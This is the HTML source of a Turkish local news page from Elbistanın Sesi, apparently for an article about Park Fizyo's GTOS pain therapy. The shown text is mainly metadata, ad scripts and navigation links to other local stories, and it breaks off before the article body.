
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Park Fizyo’dan ağrılara GTOS terapi çözümü</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Park Fizyo Ağrısız Yaşam Merkezi fizyoterapistleri Seyda Taşolar ve Sedanur Bölükbaşı ağrısı olan danışanlar için uyguladıkalrı GTOS (ağrı)"> <meta name="keywords" content="Park Fizyo&amp;#039;dan ağrılara GTOS terapi çözümü"> <meta name="news_keywords" content="Park Fizyo&amp;#039;dan ağrılara GTOS terapi çözümü"> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Park Fizyo’dan ağrılara GTOS terapi çözümü"> <meta property="og:description" content="Park Fizyo Ağrısız Yaşam Merkezi fizyoterapistleri Seyda Taşolar ve Sedanur Bölükbaşı ağrısı olan danışanlar için uyguladıkalrı GTOS (ağrı)"> <meta property="og:url" content="http://www.elbistaninsesi.com/guncel/park-fizyodan-agrilara-gtos-terapi-cozumu-h69447.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2021/03/park_fizyodan_agrilara_gtos_terapi_cozumu_h69447_f96cd.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Park Fizyo’dan ağrılara GTOS terapi çözümü"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/park-fizyodan-agrilara-gtos-terapi-cozumu-h69447.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Park Fizyo’dan ağrılara GTOS terapi çözümü"> <meta name="twitter:description" content=" Park Fizyo Ağrısız Yaşam Merkezi fizyoterapistleri Seyda Taşolar ve Sedanur Bölükbaşı, ağrısı olan danışanlar için uyguladıkalrı GTOS (ağrı) terapi yöntemleri ve beraberinde onlar için oluşturdukları egzersiz programları ile ağrısız bir yaşam fırsatı sunduklarını söylediler."> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2021/03/park_fizyodan_agrilara_gtos_terapi_cozumu_h69447_f96cd.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href="https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext" rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href="https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext" rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2021/03/park_fizyodan_agrilara_gtos_terapi_cozumu_h69447_f96cd.jpg" /> <meta itemprop="headline" content="Park Fizyo’dan ağrılara GTOS terapi çözümü" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/park_fizyodan_agrilara_gtos_terapi_cozumu_h69447_f96cd.jpg" /> <meta itemprop="articleSection" content="Güncel" name="section" /> <meta itemprop="dateCreated" content="2021-03-06T18:55:52+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2021/03/park_fizyodan_agrilara_gtos_terapi_cozumu_h69447_f96cd.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="Park Fizyo&amp;#039;dan ağrılara GTOS terapi çözümü" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <script data-ad-client="pub-3633419220222736" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">7.5315</span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate">8.9768</span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate">411.307</span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate">1542</span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/250-bin-tllik-ziynet-esyasi-calan-kadin-tutuklandi-h69448.html" title="250 bin TL’lik ziynet eşyası çalan kadın tutuklandı" >250 bin TL’lik ziynet eşyası çalan kadın tutuklandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/park-fizyodan-agrilara-gtos-terapi-cozumu-h69447.html" title="Park Fizyo’dan ağrılara GTOS terapi çözümü" >Park Fizyo’dan ağrılara GTOS terapi çözümü</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kahramanmarasli-sehidin-cenaze-namazini-dayisi-kildirdi-h69446.html" title="Kahramanmaraşlı şehidin cenaze namazını dayısı kıldırdı" >Kahramanmaraşlı şehidin cenaze namazını dayısı kıldırdı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/sehit-astsubay-nazmi-yilmaz-son-yolculuguna-ugurlandi-h69445.html" title="Şehit Astsubay Nazmi Yılmaz, son yolculuğuna uğurlandı" >Şehit Astsubay Nazmi Yılmaz, son yolculuğuna uğurlandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/ozel-yildiz-koleji-bursluluk-sinavi-yapacak-h69444.html" title="Özel Yıldız Koleji bursluluk sınavı yapacak" >Özel Yıldız Koleji bursluluk sınavı yapacak</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/minik-aysenin-hayatini-degistiren-ameliyat-h69443.html" title="Minik Ayşe’nin hayatını değiştiren ameliyat" >Minik Ayşe’nin hayatını değiştiren ameliyat</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/bolgedeki-endustriyel-madenler-icin-ihalar-devrede-h69442.html" title="Bölgedeki endüstriyel madenler için İHA’lar devrede" >Bölgedeki endüstriyel madenler için İHA’lar devrede</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-dunya-kadinlar-gunu-mesaji-h69441.html" title="Kaymakam Demir’den Dünya Kadınlar Günü mesajı" >Kaymakam Demir’den Dünya Kadınlar Günü mesajı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kaymakam-genclerle-celik-comak-oynadi-h69440.html" title="Kaymakam, gençlerle çelik-çomak oynadı" >Kaymakam, gençlerle çelik-çomak oynadı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/yasli-adamin-250-bin-tllik-ziynet-esyasini-calan-kadin-yakalandi-h69437.html" title="Yaşlı adamın 250 bin TL’lik ziynet eşyasını çalan kadın yakalandı" >Yaşlı adamın 250 bin TL’lik ziynet eşyasını çalan kadın yakalandı</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="d76436f7b1f4c7eecd51057454e1f41aa26dc205" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Park Fizyo’dan ağrılara GTOS terapi çözümü" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-lemanur-kama-h69439.html" title="Vefat - Teşekkür / Lemanur Kama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/vefat_tesekkur_lemanur_kama_h69439_a8c53.jpg" alt="Vefat - Teşekkür / Lemanur Kama" /> Vefat - Teşekkür / Lemanur Kama</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-emine-kanmaz-h69438.html" title="Vefat - Teşekkür / Emine Kanmaz"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/vefat_tesekkur_emine_kanmaz_h69438_2ce7d.jpg" alt="Vefat - Teşekkür / Emine Kanmaz" /> Vefat - Teşekkür / Emine Kanmaz</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/hacer-turk-h69428.html" title="Hacer Türk"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/hacer_turk_h69428_52325.jpg" alt="Hacer Türk" /> Hacer Türk</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/anma-hanifi-ceran-h69416.html" title="Anma / Hanifi Ceran"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/anma_hanifi_ceran_h69416_06379.jpg" alt="Anma / Hanifi Ceran" /> Anma / Hanifi Ceran</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/250-bin-tllik-ziynet-esyasi-calan-kadin-tutuklandi-h69448.html" title="250 bin TL’lik ziynet eşyası çalan kadın tutuklandı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/250_bin_tllik_ziynet_esyasi_calan_kadin_tutuklandi_h69448_a4060.jpeg" alt="250 bin TL’lik ziynet eşyası çalan kadın tutuklandı" /> 250 bin TL’lik ziynet eşyası çalan kadın tutuklandı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/park-fizyodan-agrilara-gtos-terapi-cozumu-h69447.html" title="Park Fizyo’dan ağrılara GTOS terapi çözümü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/park_fizyodan_agrilara_gtos_terapi_cozumu_h69447_f96cd.jpg" alt="Park Fizyo’dan ağrılara GTOS terapi çözümü" /> Park Fizyo’dan ağrılara GTOS terapi çözümü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/kahramanmarasli-sehidin-cenaze-namazini-dayisi-kildirdi-h69446.html" title="Kahramanmaraşlı şehidin cenaze namazını dayısı kıldırdı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/kahramanmarasli_sehidin_cenaze_namazini_dayisi_kildirdi_h69446_4483e.jpg" alt="Kahramanmaraşlı şehidin cenaze namazını dayısı kıldırdı" /> Kahramanmaraşlı şehidin cenaze namazını dayısı kıldırdı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/sehit-astsubay-nazmi-yilmaz-son-yolculuguna-ugurlandi-h69445.html" title="Şehit Astsubay Nazmi Yılmaz, son yolculuğuna uğurlandı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/sehit_astsubay_nazmi_yilmaz_son_yolculuguna_ugurlandi_h69445_ac540.jpg" alt="Şehit Astsubay Nazmi Yılmaz, son yolculuğuna uğurlandı" /> Şehit Astsubay Nazmi Yılmaz, son yolculuğuna uğurlandı</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" /> İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" /> AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" /> Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" /> Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" /> Filenin sultanları, Nevşehir’i ağırlayacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" /> PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" /> Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" /> Mikrokredi desteği koronavirüs döneminde de devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a 